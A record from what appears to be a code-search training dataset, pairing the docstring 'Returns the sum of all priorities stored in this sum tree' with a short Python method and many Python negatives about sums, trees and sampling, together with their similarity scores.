query
stringlengths
9
3.4k
document
stringlengths
9
87.4k
metadata
dict
negatives
listlengths
4
101
negative_scores
listlengths
4
101
document_score
stringlengths
3
10
document_rank
stringclasses
102 values
Returns the sum of all priorities stored in this sum tree.
def _total_priority(self): return self.nodes[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sum(self) -> int:\n return self.root.sum", "def sum(self):\n return sum(self.items())", "def get_sum(self):\n return self.__tree[0]", "def sum(self):\n return sum(self._values.values())", "def total_priority(self) -> int:\n return self.tree[0].item()", "def sum(self):\n return self._summarize(lambda c: c.sum)", "def sum(self):\n return sum(self.values)", "def sum (self):\n return self.values.sum ()", "def sum (self):\n return self.values.sum ()", "def sum(self):\n return self.aggregate(np.sum)", "def sum(self):\n return self._reduce_for_stat_function(F.sum, only_numeric=True)", "def total(self):\n return sum(self.meta) + sum(child.total() for child in self.children)", "def sum(self):\n return self.vsum", "def _sum(self):\n s = 0\n for element, value in self.items():\n s += value\n return s", "def sum(self) -> float:\n return sum(self.values)", "def sum(self):\n import numpy as np\n\n # covering zero-matrices\n if self.child_nodes == {}:\n return self.null_value\n\n def sum_rec(node, offset):\n # making sure the node exists\n if not node:\n return 0\n # checking whether the node is a leaf\n elif node.is_leaf():\n return np.sum(node.dtype.to_mat(node, offset))\n else:\n tmp_result = 0\n # the recursive call\n # checking for the kind of diagram. MTxxx?\n if self.offsets == {}:\n for edge_name in node.child_nodes:\n tmp_result += sum_rec(node.child_nodes[edge_name], node.dtype.to_mat(node, 0, 0))\n # or edge-value dd?\n else:\n for edge_name in node.child_nodes:\n tmp_result += sum_rec(node.child_nodes[edge_name], node.dtype.to_mat(node,\n node.offsets[edge_name],\n offset))\n\n return tmp_result\n\n return sum_rec(self, None)", "def calculate_sum(self):\n\n left_sum = self.left.calculate_sum() if self.left else 0\n right_sum = self.right.calculate_sum() if self.right else 0\n return self.data + left_sum + right_sum", "def total(self):\n return sum(self.d.values())", "def total(self):\n total = sum(self.d.values())\n return total", "def weighted_sum(self):\n return sum(self.wvalues)", "def total_nodes(self)->int:\n\t\tqueue=[]\n\t\tsum=0\n\t\tqueue.append(self)\n\t\twhile(len(queue)>0):\n\t\t\tnode=queue.pop(0)\n\t\t\tsum+=1\n\t\t\tif(node.right!=None):\n\t\t\t\tqueue.append(node.right)\n\t\t\tif(node.left!=None):\n\t\t\t\tqueue.append(node.left)\n\t\treturn sum", "def sum(self):\n return np.dot(self.data.T, self.weights)", "def total(tree):\n if tree is None:\n return 0\n return total(tree.left) + total(tree.right) + tree.cargo", "def n(self):\n return sum(list(self.nodes.values()))", "def sum_tree(t):\n \"*** YOUR CODE HERE ***\"\n if is_leaf(t):\n return entry(t)\n total = entry(t)\n for subtree in subtrees(t):\n total += sum_tree(subtree)\n return total", "def summation(self):\n return sum(self.read_ints())", "def op_sum(self, args):\n sum = 0\n stack_levels = len(self.stack)\n if args != None:\n stack_levels = int(args[0])\n self.require_stack(stack_levels)\n for i in range(0, stack_levels):\n sum += self.stack.pop()\n self.stack.append(sum)", "def get_sum_progress_event(self, event):\n return sum(map(lambda node: node[event], self.values()))", "def sum(self, values):\n return self.aggregate(values, \"sum\")", "def BinaryTreeNodeDepthSum(self, root):\n return self.__binary_tree_node_sum(root)", "def value(self):\n if self.children == tuple():\n return sum(self.meta)\n total = 0\n for meta in self.meta:\n if 0 < meta <= len(self.children):\n total += self.children[meta-1].value()\n return total", "def sum(self):\n # skipna == True\n # only_numerical == True\n # skipna == True\n return self._lift(\"sum\")", "def get_sum(self, i):\n s = 0\n\n # index in BITree is 1 more than index in arr[]\n i += 1\n\n # Traverse to leaves of BITree[i]:\n while i > 0:\n s += self.BITree[i]\n\n # Move index to parent node (next set bit in binary representation)\n i -= i & (-i)\n\n return s", "def sumo(self):\n\n return self._sumo", "def compute_node_sums(nodes):\n for node in nodes:\n node.children_summed = 0 # Dynamically add a meta field to Node to improve runtime when computing sums.\n\n leaf_nodes = []\n for node in nodes:\n if len(node.children) == 0:\n leaf_nodes.append(node)\n to_process = leaf_nodes\n while to_process:\n node = to_process.pop()\n # if leaf_node or all child notes computed their sum.\n if len(node.children) == 0 or len(node.children) == node.children_summed:\n node.sum = node.value\n if len(node.children) > 0:\n node.sum = node.sum + sum([child.sum for child in list(node.children.values())])\n if node.parent:\n node.parent.children_summed += 1\n if len(\n node.parent.children) == node.parent.children_summed: # all children have computed their sums\n to_process.append(node.parent)\n\n for node in nodes:\n del node.children_summed", "def get_weights_sum(self):\n return self.w_sum", "def sum_of_nodes(t):\n return label(t) + sum([sum_of_nodes(b) for b in branches(t)])", "def sum(self):\n return sum(self.times)", "def sum(self):\n return sum(self.times)", "def sum(self):\n return sum(self.times)", "def sum_of(self, names):\n vals = self.get_values(names)\n if vals is None:\n return None\n return sum(vals)", "def sumAllValues(self,*toSkip):\n sum=0\n for counterKey in self.counters.keys():\n if not counterKey in toSkip: sum += self.counters[counterKey]\n # 026 #self.debug.mainLogger.debug(\"Sumation of all counters finished with result %i.\"%(sum))\n return sum", "def getValue(self):\n result = 0.0\n for e in self.children:\n result += e.getValue()\n return result", "def sum_values(self):\n raise NotImplementedError", "def get_sum(self, node: Optional[TreeNode]) -> int:\n if not node:\n return 0\n l_sub_sum, r_sub_sum = self.get_sum(node.left), self.get_sum(node.right)\n self.ans += abs(l_sub_sum - r_sub_sum)\n\n return node.val + l_sub_sum + r_sub_sum", "def minimum_path_sum(self, root) -> int:\n\n def minimum_path_sum_aux(root, path=None):\n path.append(root.value)\n new_path = path[:]\n\n # Stop condition\n if root.is_leaf():\n return\n else:\n if root.left is not None:\n minimum_path_sum_aux(root.left, path=path)\n elif root.right is not None:\n minimum_path_sum_aux(root.right, path=path)\n\n if root.right is not None and root.left is not None:\n paths.append(new_path)\n minimum_path_sum_aux(root.right, path=new_path)\n\n paths = [[]]\n\n minimum_path_sum_aux(root, path=paths[0])\n return min([sum(path) for path in paths])", "def find_level_maxsum (self):\r\n level_queue = [self]\r\n next_level_queue = []\r\n curr_level = 0\r\n max_sum = -sys.maxsize\r\n while level_queue:\r\n curr_node = level_queue.pop(0)\r\n if curr_node.left:\r\n next_level_queue.append(curr_node.left)\r\n if curr_node.right:\r\n next_level_queue.append(curr_node.right)\r\n if not level_queue:\r\n sum_value = 0\r\n for nodes in next_level_queue:\r\n sum_value += nodes.root\r\n if sum_value > max_sum:\r\n max_sum = sum_value\r\n curr_level += 1\r\n level_queue = next_level_queue[:]\r\n next_level_queue = []\r\n if self.root> max_sum:\r\n max_sum = self.root\r\n return max_sum", "def cumsum(self):\n return self._lift(lambda c: c.cumsum)", "def total(self):\n gd_total = self._grand_total()\n counts = self._get_as_dict_count()\n for rule in self.rules:\n gd_total += rule(counts)\n return gd_total", "def sum(self, flow=False):\n return self._hist.sum(flow)", "def totalCount(self):\n return sum(self.values())", "def totalCount(self):\n return sum(self.values())", "def totalCount(self):\n return sum(self.values())", "def __binary_tree_node_sum(self, root, depth=0, node_type=None):\n if root == None:\n return self.node_sum\n multiplication_factor = 1\n if node_type == \"left\" and depth % 2 == 0:\n multiplication_factor = 2\n self.node_sum += depth * multiplication_factor\n self.__binary_tree_node_sum(root.left, depth=depth+1, node_type=\"left\")\n self.__binary_tree_node_sum(root.right, depth= depth+1, node_type=\"right\")\n return self.node_sum", "def wsum(self):\n return reduce(operator.add, self.wvalues, 0.0)", "def grand_total(self):\n return sum(self.grid[pos][1] for pos in assignable_positions if self.grid[pos][0]) + self.grid[\"nb\"][1]", "def sum(self, start=0, end=None):\n return super(SumSegmentTree, self).reduce(start, end)", "def sum(self, start=0, end=None):\n return super(SumSegmentTree, self).reduce(start, end)", "def sum(self, start=0, end=None):\n return super(SumSegmentTree, self).reduce(start, end)", "def sum(self, start=0, end=None):\n return super(SumSegmentTree, self).reduce(start, end)", "def sum(self, start=0, end=None):\n return super(SumSegmentTree, self).reduce(start, end)", "def total_qty(self):\n return sum(self.quantities)", "def get_all_edges(self):\n sum = 0\n for vertex in self:\n sum += vertex.get_edges()\n return sum", "def sum(self):\n total = 0\n for el in self.__list:\n if type(el) is int or type(el) is float:\n total += el\n elif not el:\n continue\n else:\n total += len(el)\n return total", "def totalValue(self):\n\n\t\tvalue = 0\n\t\tfor bottle in self.bottles:\n\t\t\tvalue += bottle.inflatedCost\n\n\t\treturn value", "def logp_sum(self, *args, **kwargs):\n ## CHANGED\n #return tt.sum(self.logp(*args, **kwargs))\n return S.tsum(self.logp(*args, **kwargs))", "def getScore(self):\n return sum(self.field)", "def probOfAllNodeObservations( self ):\n aLeaf = list( self._hyperGraph.leaves )[ 0 ]\n\n total = LogVar( 0 )\n for i in range( aLeaf.N ):\n _u = aLeaf.getFullJoint( i )\n total += _u\n return total", "def calcularTotal(self):\n subtotales=[]\n for row in range(0,self.tableNC.rowCount()):\n subtotales.append(float(self.tableNC.item(row,2).text()))\n return sum(subtotales)", "def number_total(self):\n return sum(self.grid[pos][1] for pos in [\"n1\", \"n2\", \"n3\", \"n4\", \"n5\", \"n6\"] if self.grid[pos][0])", "def total_score(self):\n return _projected_site_total_score(self)", "def _prefix_sum(self, i: int) -> int:\n pref_sum = 0\n while i > 0:\n pref_sum += self.tree[i]\n i &= ~self._lsb(i) # Equivalent to i -= _lsb(i)\n \n return pref_sum", "def calculate_sum_of_all_attributes(self):\n\n sum = 0\n\n for key, val in self.__dict__.items():\n\n if isinstance(val, (int, float)):\n sum += val\n\n return sum", "def sum(self):\n\n return time_stat(self, stat=\"sum\")", "def total_cost(self):\r\n return sum(i.line_cost for i in self.orderitem_set.filter(status=self.status)) # pylint: disable=E1101\r", "def rowsums (self):\n return self.values.sum (axis=0)", "def sum(self):\n if self.isscalar():\n s = self.defval\n else:\n if self.defval:\n msg = \"Sum of a tensor wish defval != 0 not implemented.\"\n raise NotImplementedError(msg)\n s = 0\n for v in self.sects.values():\n s += np.sum(v)\n return s", "def sum_points(self) -> int:\n return sum([card.rank_value for card in self.deck.cards])", "def cost(self):\n node, path_back = self, []\n cost = 0\n while node:\n path_back.append(node)\n if node.action is not None:\n cost = cost + node.action.cost\n node = node.parent\n # remove one due to root empty node \n #cost = cost-1\n return [cost, list(reversed(path_back))]", "def sum_of_tree(root_elem):\r\n\tif root_elem is None:\r\n\t\treturn 0\r\n\treturn root_elem.value + sum_of_tree(root_elem.left) + sum_of_tree(root_elem.right)", "def sumSet(weightedSet):\n\tsum = 0\n\tfor example in weightedSet:\n\t\tsum += example.weight\n\treturn sum", "def total_value(self):\n return self.parent.child_total_value[self.action]", "def _get_sum(self):\r\n try:\r\n return self._sum\r\n except AttributeError:\r\n self._sum = self.no_nan.sum()\r\n # The following 2 lines are needede as in Python 3.3 with NumPy\r\n # 1.7.1, numpy.ndarray and numpy.memmap aren't hashable.\r\n if type(self._sum) is numpy.memmap:\r\n self._sum = numpy.asarray(self._sum).item()\r\n if self.has_nan and self.no_nan.mask.all():\r\n # In this case the sum is not properly computed by numpy.\r\n self._sum = 0\r\n if numpy.isinf(self._sum) or numpy.isnan(self._sum):\r\n # NaN may happen when there are both -inf and +inf values.\r\n if self.has_nan:\r\n # Filter both NaN and Inf values.\r\n mask = self.no_nan.mask + numpy.isinf(self[1])\r\n else:\r\n # Filter only Inf values.\r\n mask = numpy.isinf(self[1])\r\n if mask.all():\r\n self._sum = 0\r\n else:\r\n self._sum = numpy.ma.masked_array(self[1], mask).sum()\r\n # At this point there should be no more NaN.\r\n assert not numpy.isnan(self._sum)\r\n return self._sum", "def n(self):\n return sum(self._comp.values())", "def total_reward(self):\n return np.sum(self.rewards)", "def __puntuacion_total(self):\n disparos = []\n for disparo in self.__disparos:\n total = 0\n for puntaje in disparo['disparos']:\n total += puntaje\n disparo['puntaje_total'] = total\n disparos.append(disparo)\n return disparos", "def prob_sum(graph, key):\n return sum(edge_prob(graph, edge, True) for edge in key)", "def sum_node_list(node_list):\r\n from operator import add\r\n from functools import reduce\r\n return reduce(add, node_list)", "def sum_rating(self):\n return self.get_queryset().aggregate(Sum('vote')).get('vote__sum') or 0", "def sum_node_list(node_list):\n from operator import add\n from functools import reduce\n return reduce(add, node_list)", "def _calculate_weights(curr_level, edge_sum):\n curr_level_weights = {n: 1 for n in curr_level}\n for curr_node in edge_sum:\n curr_level_weights[curr_node] += edge_sum[curr_node]\n return curr_level_weights", "def priority(self):\n return self._pri", "def mlp_weight_sum(self) -> Tuple[Tensor, Tensor]:\n if self._model:\n return self._model.mlp_weight_sum()\n return torch.tensor([0.0]), torch.tensor([0.0])", "def SumTotalCost():\n\n logs.logger.debug(\"Start to add all amount of Cost objects.\")\n try:\n sumTotal = 0\n for item in GetAllAmountOfCost():\n sumTotal += item\n logs.logger.info(\"Add all amount of Cost objects.\")\n return sumTotal\n except Exception as e:\n logs.logger.error(e, exc_info=True)", "def update_priority(self, indexes, values):\n values = values * 10000\n values = self._clip_p(values)\n values = int(values)\n self.sum_tree.update(indexes, values)", "def with_sum_sum_reduction(self):\n return self.with_reduction(lambda x: x.sum())", "def get_total_assigned(self):\n return sum(self.n_assigned_list)", "def tc(self):\n return np.sum(self.tcs)", "def score(self, tree):\n probas = [self.prod_freq.get(prod, 0.5) /\n self.source_freq.get(prod.source, 1)\n for prod in tree]\n logger.debug(\"Scoring {0}:\".format(tree))\n for prod, proba in zip(tree, probas):\n logger.debug(\n \"\\t- {0} {1}({2})\"\n .format(prod, round(proba, 3), round(log(proba, 10), 3)))\n log_proba = sum(log(proba, 10) for proba in probas)\n return {\n 'log_proba': log_proba,\n 'productions': len(probas)\n }", "def get_total_redeem(self):\n total = 0\n for redeem in self.get_redeems():\n total += redeem.get_total()\n return total" ]
[ "0.6984377", "0.67695606", "0.67609626", "0.6698405", "0.6667603", "0.6662966", "0.66467816", "0.66216046", "0.66216046", "0.65775466", "0.6440943", "0.6387141", "0.635604", "0.6329519", "0.63249815", "0.6249568", "0.61827457", "0.6161957", "0.61138844", "0.6100439", "0.6093953", "0.60443217", "0.6023509", "0.5953569", "0.5916209", "0.58830446", "0.58670497", "0.5861232", "0.5834539", "0.5794486", "0.5753008", "0.57492274", "0.57482564", "0.5733829", "0.57316864", "0.57234776", "0.5712779", "0.5691289", "0.5691289", "0.5691289", "0.56727785", "0.56599355", "0.56383795", "0.56267166", "0.5622123", "0.5590967", "0.5563677", "0.5563247", "0.55527186", "0.5548702", "0.5547159", "0.5547159", "0.5547159", "0.55431604", "0.55221766", "0.5520411", "0.551625", "0.551625", "0.551625", "0.551625", "0.551625", "0.5485707", "0.5484552", "0.5472757", "0.5470407", "0.54533595", "0.5443762", "0.5428021", "0.54051423", "0.54026175", "0.5399512", "0.53663146", "0.5363358", "0.5350568", "0.5349872", "0.5344437", "0.53439915", "0.53229207", "0.53188586", "0.53181136", "0.5309418", "0.52910894", "0.5276108", "0.52696973", "0.5263087", "0.52563745", "0.5218554", "0.52162385", "0.520819", "0.5191034", "0.51792353", "0.51755023", "0.5161991", "0.51579523", "0.5154866", "0.5150504", "0.5148262", "0.51457447", "0.51349735", "0.5131171" ]
0.65628356
10
Samples an element from the sum tree.
def sample(self, rng, query_value=None): nodes = jnp.array(self.nodes) query_value = ( jax.random.uniform(rng) if query_value is None else query_value) query_value *= self._total_priority() _, index, _ = jax.lax.fori_loop(0, self.depth, step, (query_value, 0, nodes)) return np.minimum(index - self.low_idx, self.highest_set)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sample(self):\n return self._root.sample()", "def sample(self) -> None:\n with self._samples_lock:\n if self.element_sampler.has_element:\n self._samples.append(self.element_sampler.el)\n self.element_sampler.has_element = False", "def sample(self, x):", "def sample(self):\n raise NotImplementedError", "def sample(self):\n raise NotImplementedError", "def sample(self, observation):\n raise NotImplementedError", "def sample(self, bqm, **parameters):\n return self.child.sample(bqm, **parameters)", "def sample_one(self):\n # x = self.mean + self.sigma * np.random.normal()\n x = self.dist.sample(1)\n return x", "def sample(self):\r\n raise NotImplementedError", "def sample(self, my_sample):\n with self.sample_lock:\n self.sum_ += my_sample\n if my_sample > self.max_sample:\n self.max_sample = my_sample\n if my_sample < self.min_sample:\n self.min_sample = my_sample\n self.count += 1", "def stratified_sample(self, batch_size, rng):\n if self._total_priority() == 0.0:\n raise Exception('Cannot sample from an empty sum tree.')\n\n indices = parallel_stratified_sample(rng, self.nodes, np.arange(batch_size),\n batch_size, self.depth)\n return np.minimum(indices - self.low_idx, self.highest_set)", "def sample(self):", "def sample(self, n):\n raise NotImplementedError", "def sample(self, point, n_samples=1):\n raise NotImplementedError(\"The sample method is not yet implemented.\")", "def test_score_with_sample_weights():\n atom = ATOMClassifier(X_bin, y_bin, random_state=1)\n atom.run(\"Tree\")\n score = atom.tree.score(X_bin, y_bin, sample_weight=list(range(len(y_bin))))\n assert isinstance(score, np.float64)", "def easy_sample(self, num, **kwargs):\n return self.preprocess(self.sample(num, **kwargs), **kwargs)", "def sample(self, size=1):\n pass", "def sample(self):\n return self._sample_func", "def samples(self, u=None):\n roots = [u]\n if u is None:\n roots = self.roots\n for root in roots:\n yield from self._sample_generator(root)", "def sample(self, n=1):\n raise NotImplementedError", "def sample(self, seed=None):\n raise NotImplementedError()", "def sample(self,p0=None,nsamp=None): \r\n raise NotImplementedError('Need to implement sample function')", "def sample(self):\n raise NotImplementedError(\"Override me!\")", "def sample(self, size=1):\n raise NotImplementedError", "def sample(self, size=1):\n raise NotImplementedError", "def sample(self, size=1):\n raise NotImplementedError", "def sample(self, size=1):\n raise NotImplementedError", "def sample(self, sample_shape=t.Size(), avg=True):\n with t.no_grad():\n return self.rsample(sample_shape, avg)", "def sample(self):\n sampleIndices = self.random_state.choice(len(self.X), int(len(self.X)*self.sample_ratio), replace=False)\n\n return self.X[sampleIndices]\n pass", "def sample(self, root, tree, sample_num, for_d):\n\n # all_score = self.sess.run(self.generator.all_score)\n # all_score is a matrix with shape [n_node, n_node]\n all_score = self.generator.all_score\n samples = []\n paths = []\n n = 0\n\n while len(samples) < sample_num:\n current_node = root\n previous_node = -1\n paths.append([])\n is_root = True\n paths[n].append(current_node)\n while True:\n node_neighbor = tree[current_node][1:] if is_root else tree[current_node]\n # print(\"////\", tree[current_node])\n is_root = False\n if len(node_neighbor) == 0: # the tree only has a root\n return None, None\n if for_d: # skip 1-hop nodes (positive samples)\n if node_neighbor == [root]:\n # in current version, None is returned for simplicity\n return None, None\n if root in node_neighbor:\n node_neighbor.remove(root)\n\n # we retrieve embeddings corresponding to current node's neighbors\n # the multiply of g_v with shape (1, 50) and g_vi with shape(1, 50) is a scala\n # to calculate the multiply of g_v and g_vi: we calculate the \"multiplication\" (inner product) between embedding_matrix with shape(n_node, 50) and its transpose\n # then saved the result in self.score with shape (n_node, n_node) in dis_torch.py\n # all_score has the shape = (5254, 5254), each row is a list of scala, each scala is the \"multiplication\" (inner product) between a particular node to an other node in the graph\n # due to for each current_node, we have a list of its neighbors, saved in [node_neighbor]\n # we can retrieve a list of scalas that equal to the \"multiplications\" (inner product) between g_v(current node) to its neighbor g_vi\n # to do that, we have:\n relevance_probability = all_score[current_node][node_neighbor]\n\n # convert tensor to numpy array\n relevance_probability = relevance_probability.cpu().detach().numpy()\n\n # finally, applying softmax function, we get the relevance probability of current_node and its neighbors, as formed in the paper\n relevance_probability = utils.softmax(relevance_probability)\n \n # pick a random node from its neighbors based on relevance_probability\n next_node = np.random.choice(node_neighbor, size=1, p=relevance_probability)[0] # select next node\n # print(\"???\", next_node)\n paths[n].append(next_node)\n if next_node == previous_node: # terminating condition\n samples.append(current_node)\n break\n previous_node = current_node\n current_node = next_node\n n = n + 1 # n equal to sample_num\n return samples, paths # for each sample, we get one path from root to that sample", "def sample(self, k):\n result = \"\"\n current = self.gen_beginning()\n for i in range(0, k):\n result += current[0] + \" \"\n t = tuple(current)\n if t in self.dict:\n c_sum = self.dict[t][self.sum_index]\n rand = random.randint(0, c_sum)\n new_term = \"\"\n for term, count in self.dict.iteritems():\n if rand > count:\n rand -= count\n else:\n new_term = term\n break\n current.remove(current[0])\n current.append(new_term)\n else:\n current = self.gen_beginning()\n return result", "def sample(self, batch_size):\n\n if self.tree.filled_size() < batch_size:\n return None, None, None\n\n out = []\n indices = []\n weights = []\n priorities = []\n i = 0\n while i < batch_size:\n r = random.random()\n data, priority, index = self.tree.find(r)\n if not data:\n continue\n priorities.append(priority)\n weights.append((1. / self.capacity / priority) ** self.beta if priority > 1e-16 else 0)\n indices.append(index)\n out.append(data)\n self.priority_update([index], [0]) # To avoid duplicating\n i += 1\n\n self.priority_update(indices, priorities) # Revert priorities\n\n weights = [w / max(weights) for w in weights] # Normalize for stability\n\n return out, weights, indices", "def sample(self, pkg):\n return next(self.dist[pkg])", "def _sample(self, geometry: Geometry) -> math.Tensor:\n raise NotImplementedError(self)", "def sample(self, x: Union[np.ndarray, float, list]) -> float:\n return np.exp(self.log_sample(x))", "def sample(self, nsamples):\n return self.dist.sample(nsamples)", "def sampleWeight(self):\r\n x=random.random()\r\n i = 0\r\n n = len(self.weights)-1\r\n cummulativeWeight = 0\r\n #Distribute the exploration weight evenly among all the actions that have been\r\n #taken up to this point in time by any of the users\r\n if len(self.sampledActions) == 0:\r\n explorationWeight = 0\r\n else:\r\n explorationWeight = self.explorationFund / len(self.sampledActions)\r\n #Compute the normalization factor. If no action has been sampled by this user yet,\r\n #then each action k has weight eta*pi_k, where pi_k is the weight of k in the\r\n #prior distribution. Then, the normalization factor is the sum(eta*pi_k) for all k,\r\n #which is equal to eta*sum(pi_k), which is just eta, since the sum of the previous\r\n #weights has to add up to 1.\r\n #If one or more actions have been already sampled, the normalization factor is the\r\n #sum of 1) the weights already in self.weights, 2) the exploration fund, and 3) the\r\n #weights of the actions that are not yet in self.weights. Each one of these actions\r\n #has weight eta*pi_k (because it hasn't been sampled yet), so the total weight of the\r\n #mass of actions not yet in self.weights is eta*(1-sum(pi_l)), where the sum is over all\r\n #the weights already in self.weights\r\n if n < 0:\r\n normalizationFactor = self.priorBelief\r\n else:\r\n normalizationFactor = sum(self.weights) + self.explorationFund + \\\r\n self.priorBelief*(1-self.priorTopicDistr.cummulative[n])\r\n #Keep getting the next weight until the combined mass of the weights is less than the\r\n #random number x\r\n while True:\r\n w = self.__getitem__(i)\r\n if i in self.sampledActions:\r\n w += explorationWeight\r\n cummulativeWeight += w\r\n if x <= cummulativeWeight/normalizationFactor:\r\n if i not in self.sampledActions:\r\n self.sampledActions.append(i)\r\n return w\r\n i += 1", "def get_unit_element(group, component):\n return group.random(component) ** 0", "def sample(self, shape):\n\t\traise NotImplementedError()", "def sample(self, Z=None):\n Z = Z if Z is not None else self.sum() # normalize if desired / by default\n assert (Z > 0), 'Non-normalizable factor (perhaps log factor?)' # also check for positivity?\n pSoFar = 0.0\n pDraw = Z * np.random.random_sample()\n it = np.nditer(self.t, op_flags=['readonly'], flags=['multi_index']) # for tuple return\n #it = np.nditer(self.t, op_flags=['readonly'], flags=[orderMethod+'_index']) # for index return\n while not it.finished:\n pSoFar += it[0]\n if ( pSoFar > pDraw ):\n return it.multi_index # multi_index for tuple return\n #return it.index # index for index return\n it.iternext()\n return self.v.ind2sub(self.numel()-1) # if numerical issue: return final state", "def sample(self, num_samples, **kwargs):\n pass", "def addsample(self):\n if self.nsample >= len(self.samples):\n raise Exception(\"Max number of samples reached\")\n\n self.samples[self.nsample] = self.current()\n self.nsample += 1", "def sample(pi, sigma, mu):\n # print(\"sample: pi:\", pi.size(), pi)\n categorical = Categorical(pi)\n pis = list(categorical.sample().data)\n sample = Variable(sigma.data.new(sigma.size(0), sigma.size(2)).normal_())\n for i, idx in enumerate(pis):\n sample[i] = sample[i].mul(sigma[i,idx]).add(mu[i,idx])\n return sample", "def process_sample(self, value: PhyPropType) -> PhyPropType:\n pass", "def get_subsample_of_nodes(g, sampl=1):\n return sample(g.nodes(), int(len(g.nodes())*sampl))", "def regular_subsample(neuron):\n # select all the main points\n selected_index = get_main_points(neuorn)\n\n # Computing the parent id of the selected nodes\n neuron = neuron_with_selected_nodes(selected_index)\n return neuron", "def sample(self):\n return self._action_out(self._env.action_space.sample())", "def get_next_sample(self):", "def sample_from_unit_ball(rng, dim):\n vec = rng.randn(dim)\n return vec / np.sqrt(np.sum(vec**2))", "def sample(self):\n x = self.state\n# dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n dx = self.theta * (self.mu - x) + self.sigma * np.random.standard_normal(self.size)\n self.state = x + dx\n return self.state", "def sample(self, context: Context) -> T:\n ...", "def __call__(self, params):\r\n return self.sample(params)", "def __add__(self,sample):\n self.add(sample)", "def sample(self, num_samples = 1):\n\n # shortcut\n shape = self.shape\n loc = self.loc\n scale = self.scale\n\n # some sampling\n U = self.UG.sample(num_samples)\n X = 1 / scale * (-np.log(U)) ** (1 / shape)\n return scale * X + loc", "def sample(self, seg_logit, seg_label):", "def sample(self, size=None):\n return self.obj_", "def sample(tree, i, alpha=0.5, beta=0.5, only_tree=True):\n # for n in tree.nodes():\n # lab = tuple(n)\n # if len(n) == 1:\n # lab = \"(\" + str(list(n)[0]) + \")\"\n # tree.node[n] = {\"color\": \"black\", \"label\": lab}\n # print tree.nodes()\n\n if only_tree is True:\n tree_new = tree # Alter the input tree\n else:\n #tree_new = tree.subgraph(tree.nodes()) # nx < 2.0\n tree_new = tree.copy() # nx < 2.0\n\n #print(nocopy)\n #old_G = trilearn.graph.junction_tree.get_graph(tree)\n #(subtree, old_separators, probtree) = glib.random_subtree(tree, alpha, beta)\n\n # plotGraph(subtree, directory+\"subtree_\"+str(i)+\".eps\")\n # for n in subtree.nodes():\n # tree_old.node[n] = {\"color\": \"blue\", \"label\": tuple(n)}\n # if n in tree.nodes():\n # tree.node[n] = {\"color\": \"blue\", \"label\": tuple(n)}\n\n # plotGraph(tree_old.subgraph(tree_old.nodes()),\n # directory + \"tree(\" + str(i-1) + \")p.eps\")\n\n (_, subtree_nodes, subtree_edges, subtree_adjlist,\n old_separators, prob_subtree) = ss.random_subtree(tree, alpha, beta, i)\n\n (old_cliques,\n new_cliques,\n new_separators,\n P,\n neig) = sample_cond_on_subtree_nodes(i, tree_new, subtree_nodes, subtree_edges, subtree_adjlist)\n\n if only_tree is True:\n return tree_new\n #conn_nodes = set()\n #for clique in new_cliques:\n # conn_nodes |= clique\n\n # for n in tree.nodes():\n # lab = tuple(n)\n # if len(n) == 1:\n # lab = \"(\"+str(list(n)[0])+\")\"\n # if n in new_cliques:\n # tree.node[n] = {\"color\": \"red\", \"label\": lab}\n # plotGraph(tree.subgraph(tree.nodes()), directory+\"tree(\"+str(i)+\").eps\")\n\n #G = trilearn.graph.junction_tree.get_graph(tree)\n # G.node[i] = {\"color\": \"red\"}\n # for n in old_G:\n # if n in conn_nodes:\n # old_G.node[n] = {\"color\": \"blue\"}\n # G.node[n] = {\"color\": \"blue\"}\n\n # plotGraph(G, directory+\"G\"+str(i)+\".eps\")\n # plotGraph(old_G, directory+\"G\"+str(i-1)+\"p.eps\")\n\n # Proposal kernel\n K_st = None\n if len(subtree_nodes) == 1:\n # There might be two possible subtrees so\n # we calculate the probabilities for these explicitly\n K_st = pdf(tree, tree_new, alpha, beta, i)\n else:\n K_st = prob_subtree\n for c in P:\n K_st *= P[c] * neig[c]\n return tree_new, K_st, old_cliques, old_separators, new_cliques, new_separators", "def sample(self, mean, logvar, sample=False):\n if self.training or sample:\n std = torch.exp(0.5*logvar)\n eps = torch.empty(std.size(), device=self.device).normal_()\n return eps.mul(std).add(mean)\n else:\n return mean", "def sample(self, shape=(1,)):\n pass", "def sample(self, num, **kwargs):\n raise NotImplementedError(f'Should be implemented in derived class!')", "def sample(self):\n return self.items[self.np_random.choice(len(self.items))]", "def sample_tree(self):\n logger.info('TreeCatTrainer.sample_tree given %d rows',\n len(self._added_rows))\n SERIES.sample_tree_num_rows.append(len(self._added_rows))\n complete_grid = self._tree.complete_grid\n edge_logits = self.compute_edge_logits()\n assert edge_logits.shape[0] == complete_grid.shape[1]\n assert edge_logits.dtype == np.float32\n edges = self.get_edges()\n edges = sample_tree(complete_grid, edge_logits, edges)\n return edges, edge_logits", "def is_sample(self):\n return self.flags & NODE_IS_SAMPLE", "def sample_qubo(self, Q, **parameters):\n return self.child.sample_qubo(Q, **parameters)", "def sample_uniform(instance, params):\n subpop = np.random.randint(params['N'])\n return sample_from_subpop(instance, params, subpop)", "def sample_uniform():\n global samples_uniform, isample_uniform\n\n # sample of U(0, 1)\n u = samples_uniform[isample_uniform]\n\n # moving to next index of samples global array\n isample_uniform += 1\n if isample_uniform >= len(samples_uniform):\n # exhausted all samples -> re-drawing samples from U(0, 1)\n samples_uniform = np.random.uniform(size=SIZE_SAMPLES_UNIFORM)\n isample_uniform = 0\n\n return u", "def tree_query(self, pta_root):\n self.sul.pre()\n curr_node = pta_root\n\n inputs = []\n outputs = []\n\n while True:\n\n if curr_node.children:\n frequency_sum = sum(curr_node.input_frequencies.values())\n if frequency_sum == 0:\n # uniform sampling in case we have no information\n inp = choice(list(curr_node.children.keys()))\n else:\n # use float random rather than integers to be able to work with non-integer frequency information\n selection_value = random() * frequency_sum\n inp = None\n for i in curr_node.input_frequencies.keys():\n inp = i\n selection_value -= curr_node.input_frequencies[i]\n if selection_value <= 0:\n break\n # curr_node.input_frequencies[inp] -= 1\n\n inputs.append(inp)\n out = self.sul.step(inp)\n new_node = curr_node.get_child(inp, out)\n\n if new_node:\n outputs.append(out)\n curr_node = new_node\n else:\n self.sul.post()\n return\n else:\n curr_node = pta_root\n for i, o in zip(inputs, outputs):\n self.curr_node.input_frequencies[i] -= 1\n curr_node = curr_node.get_child(i, o)\n self.sul.post()\n return", "def test_simpSample(self):\n\n #uniform dist\n ulim = 